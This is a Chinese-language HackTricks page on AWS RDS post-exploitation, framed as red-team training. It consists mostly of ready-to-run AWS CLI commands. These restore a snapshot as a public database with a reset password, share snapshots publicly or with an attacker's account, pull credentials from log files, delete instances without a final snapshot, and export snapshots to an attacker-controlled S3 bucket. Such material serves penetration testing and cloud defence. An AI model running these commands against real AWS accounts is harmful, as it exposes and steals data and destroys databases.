AWS - RDS Post Exploitation

学习和练习 AWS Hacking：HackTricks Training AWS Red Team Expert (ARTE) 学习和练习 GCP Hacking：HackTricks Training GCP Red Team Expert (GRTE)

支持 HackTricks

查看 订阅计划!
加入 💬 Discord 群组 或 telegram 群组 或关注我们的 Twitter 🐦 @hacktricks_live.
通过提交 PRs 分享黑客技巧到 HackTricks 和 HackTricks Cloud github 仓库。

RDS

更多信息请查看：

AWS - Relational Database (RDS) Enum

`rds:CreateDBSnapshot`, `rds:RestoreDBInstanceFromDBSnapshot`, `rds:ModifyDBInstance`

如果攻击者有足够的权限，他可以通过创建数据库快照，然后从快照创建一个公开可访问的数据库，使数据库公开可访问。

aws rds describe-db-instances # Get DB identifier

aws rds create-db-snapshot \
--db-instance-identifier <db-id> \
--db-snapshot-identifier cloudgoat

# Get subnet groups & security groups
aws rds describe-db-subnet-groups
aws ec2 describe-security-groups

aws rds restore-db-instance-from-db-snapshot \
--db-instance-identifier "new-db-not-malicious" \
--db-snapshot-identifier <scapshotId> \
--db-subnet-group-name <db subnet group> \
--publicly-accessible \
--vpc-security-group-ids <ec2-security group>

aws rds modify-db-instance \
--db-instance-identifier "new-db-not-malicious" \
--master-user-password 'Llaody2f6.123' \
--apply-immediately

# Connect to the new DB after a few mins

`rds:ModifyDBSnapshotAttribute`, `rds:CreateDBSnapshot`

拥有这些权限的攻击者可以创建一个数据库快照并使其公开可用。然后，他可以在自己的账户中从该快照创建一个数据库。

如果攻击者没有 rds:CreateDBSnapshot 权限，他仍然可以使其他已创建的快照公开。

# create snapshot
aws rds create-db-snapshot --db-instance-identifier <db-instance-identifier> --db-snapshot-identifier <snapshot-name>

# Make it public/share with attackers account
aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all
## Specify account IDs instead of "all" to give access only to a specific account: --values-to-add {"111122223333","444455556666"}

`rds:DownloadDBLogFilePortion`

拥有 rds:DownloadDBLogFilePortion 权限的攻击者可以下载 RDS 实例日志文件的部分内容。如果敏感数据或访问凭证被意外记录，攻击者可能会利用这些信息提升其权限或执行未经授权的操作。

aws rds download-db-log-file-portion --db-instance-identifier target-instance --log-file-name error/mysql-error-running.log --starting-token 0 --output text

潜在影响：使用泄露的凭证访问敏感信息或进行未授权的操作。

`rds:DeleteDBInstance`

具有这些权限的攻击者可以对现有的RDS实例进行DoS攻击。

# Delete
aws rds delete-db-instance --db-instance-identifier target-instance --skip-final-snapshot

潜在影响: 删除现有的RDS实例，并可能导致数据丢失。

`rds:StartExportTask`

TODO: 测试

具有此权限的攻击者可以将RDS实例快照导出到S3存储桶。如果攻击者控制了目标S3存储桶，他们可能会访问导出快照中的敏感数据。

aws rds start-export-task --export-task-identifier attacker-export-task --source-arn arn:aws:rds:region:account-id:snapshot:target-snapshot --s3-bucket-name attacker-bucket --iam-role-arn arn:aws:iam::account-id:role/export-role --kms-key-id arn:aws:kms:region:account-id:key/key-id

潜在影响: 访问导出快照中的敏感数据。

学习和练习 AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) 学习和练习 GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

支持 HackTricks